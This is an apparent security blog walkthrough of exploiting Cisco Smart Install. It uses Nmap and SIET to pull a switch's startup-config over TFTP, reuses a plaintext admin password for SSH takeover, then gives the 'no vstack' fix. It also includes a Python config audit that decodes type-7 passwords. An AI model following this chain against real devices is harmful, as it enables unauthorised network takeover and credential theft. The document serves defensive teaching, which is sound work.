Cisco developed Smart Install, a widely used protocol for zero-touch deployment of new infrastructure. It covers devices such as switches and routers and many other devices running Cisco IOS. Smart Install listens on TCP port 4786 and requires no authentication to connect to the service. The protocol is very useful to networking professionals for the rapid deployment of new infrastructure.

One common best practice across the information technology field is to disable unnecessary services, or to disable services once they are no longer needed. However, many network administrators and engineers alike do not disable this service when the deployment is finished. Leaving it exposed lets remote, unauthenticated attackers use the service to obtain sensitive information, such as the running-config, password hashes or plaintext passwords, and network topology information, or even to take over the device completely.

The following demo demonstrates abusing Smart Install with the common tools and techniques seen in modern networks.

We first perform a remote port scan within the network using a port scanner such as Nmap:

From Nmap's OS fingerprint, the remote device appears to be a Cisco device, and with TCP port 4786 open we have reason to believe that it is running Smart Install. How can we confirm this? Many tools have been created for Smart Install exploitation; one common tool is SIET (Smart Install Exploitation Tool). Let's use SIET to confirm whether this remote device is indeed running Smart Install:

With this information at hand, we can confirm that the remote device is indeed running Smart Install. Let's proceed with exploiting this misconfiguration.

Using SIET, we can obtain the startup-config (the Cisco IOS configuration stored in NVRAM, as opposed to the running-config, which lives in RAM). SIET spins up a TFTP server on the attacking machine, and once exploited, the device running Smart Install runs "copy startup-config tftp (remote attacker IP)". The following screenshot demonstrates this:

The startup-config is full of useful information, including password hashes, local usernames and passwords (plaintext or hashed), and network topology information such as VLANs and trunk links. We can now open the startup-config and view this information:

As seen in the startup-config, we have a local "admin" account with a plaintext password and privilege level 15. Privilege level 15 in Cisco IOS is the equivalent of "root" on Linux or "NT AUTHORITY\SYSTEM" on Windows.

From the port scan performed earlier, we noticed that both SSH and Telnet were open on the remote device. Let's try to SSH into this Cisco device with the newly obtained credentials:

As you can see, we have successfully established an SSH connection to the remote device and fully compromised it. Let's confirm this by viewing the Spanning Tree Protocol topology information. This confirms that we are now remotely connected to the Cisco device and have full device takeover.

Q: How can this attack be prevented in modern networks?

A: This attack can be prevented by performing the following: In global configuration mode on your Cisco device, issue the command "no vstack". Confirm that the configuration applied successfully by issuing "show vstack status", and save the configuration so the setting survives a reload. Note that disabling Smart Install after the fact does not undo an earlier exposure: every credential present in a configuration that may already have been pulled this way has to be treated as compromised and changed.

This is one of the many different attacks that can be performed on Cisco devices, and it is very common in modern networks. The remediation effort is minimal compared to the recovery effort if this is exploited remotely.
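As an added example (not part of the original post, and not SIET's own code), here is a Python audit that runs over a dumped startup-config and flags the weaknesses this walkthrough relies on: Smart Install left enabled (no "no vstack" line in the config), privilege-15 local accounts whose passwords are plaintext or type 7 (a reversible obfuscation, not a hash), vty lines that still accept Telnet, and a recoverable "enable password". The configuration text is a constructed sample: the hostname, usernames, the "Cisco123" password and the placeholder "$1$" hashes are invented for illustration, and treating a vty stanza with no explicit "transport input" as Telnet-capable is an assumption noted in the code.

```python
"""Audit a Cisco IOS startup-config for the weaknesses shown in the Smart Install walkthrough.

Added example, not code from the original post or from SIET. Run it over a configuration
you pulled from a device you administer; the sample below is constructed.
"""
import re

# Type 7 "encryption" is a fixed-key XOR, not a hash: anyone holding the config can reverse it.
# This key string is the well-known one shared by every public type-7 decoder.
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv"

# Constructed sample startup-config (not a real device): hostname, usernames, the plaintext
# password and the placeholder $1$ hashes are made up for the example.
SAMPLE_CONFIG = """\
hostname SW-ACCESS-01
!
username admin privilege 15 password 0 Cisco123
username backup privilege 15 password 7 0822455D0A16
username netops privilege 15 secret 5 $1$abcd$placeholderhash0000000000000
!
enable secret 5 $1$efgh$placeholderhash1111111111111
!
vlan 10
 name USERS
!
interface GigabitEthernet0/1
 switchport mode trunk
!
line vty 0 4
 transport input all
line vty 5 15
 transport input ssh
!
end
"""

USERNAME_RE = re.compile(
    r"^username\s+(\S+)(?:\s+privilege\s+(\d+))?\s+(password|secret)\s+(?:(\d)\s+)?(\S+)",
    re.M,
)
ENABLE_PW_RE = re.compile(r"^enable password\s+(?:(\d)\s+)?(\S+)", re.M)


def decode_type7(encoded: str) -> str:
    """Reverse a 'password 7' string: two-digit key offset, then hex of (byte XOR key byte)."""
    seed = int(encoded[:2])
    body = bytes.fromhex(encoded[2:])
    return "".join(chr(b ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)]) for i, b in enumerate(body))


def recover(kind, ptype, value):
    """Return the cleartext when the config itself reveals it, else None."""
    if kind == "secret":
        return None          # types 5/8/9 are real hashes; those are a job for a cracker
    if ptype == "7":
        return decode_type7(value)
    return value             # 'password 0 ...' or a bare 'password ...' is plaintext


def local_users(config: str):
    """Yield (username, privilege, recovered_password) for each 'username' line."""
    for name, priv, kind, ptype, value in USERNAME_RE.findall(config):
        yield name, int(priv) if priv else 1, recover(kind, ptype, value)  # IOS default is 1


def vty_stanzas(config: str):
    """Yield (range, [indented lines]) for every 'line vty' stanza."""
    lines = config.splitlines()
    i = 0
    while i < len(lines):
        if lines[i].startswith("line vty"):
            rng, body, i = lines[i][len("line vty"):].strip(), [], i + 1
            while i < len(lines) and lines[i].startswith(" "):
                body.append(lines[i].strip())
                i += 1
            yield rng, body
        else:
            i += 1


def audit_config(config: str) -> dict:
    """Collect the findings an attacker holding this config would act on."""
    findings = {
        # Smart Install is on by default on client switches and leaves no line in the config;
        # disabling it writes 'no vstack'. Its absence therefore means TCP/4786 is exposed.
        "smart_install_enabled": re.search(r"^no vstack\s*$", config, re.M) is None,
        "privileged_recoverable_users": [],
        "vty_not_ssh_only": [],
        "enable_password_recoverable": None,
    }
    for name, priv, recovered in local_users(config):
        if priv == 15 and recovered is not None:
            findings["privileged_recoverable_users"].append((name, recovered))
    for rng, body in vty_stanzas(config):
        allowed = set()
        for line in body:
            if line.startswith("transport input"):
                allowed.update(line.split()[2:])
        # 'all', 'telnet', or no explicit restriction (assumed to permit Telnet) all fail
        if allowed != {"ssh"}:
            findings["vty_not_ssh_only"].append(rng)
    m = ENABLE_PW_RE.search(config)
    if m:
        findings["enable_password_recoverable"] = recover("password", m.group(1), m.group(2))
    return findings


if __name__ == "__main__":
    for key, value in audit_config(SAMPLE_CONFIG).items():
        print(f"{key}: {value}")
```

On the sample, the audit reports Smart Install enabled, the "admin" and "backup" accounts as privilege-15 logins with recoverable passwords, and vty 0 4 as reachable over Telnet; the "netops" account is not listed because a type 5 secret is a real hash. Adding "no vstack" and changing "transport input all" to "transport input ssh" clears the first and third findings, which is exactly the hardening the Q&A above prescribes, while the remaining finding is only fixed by replacing the plaintext and type-7 passwords with secrets.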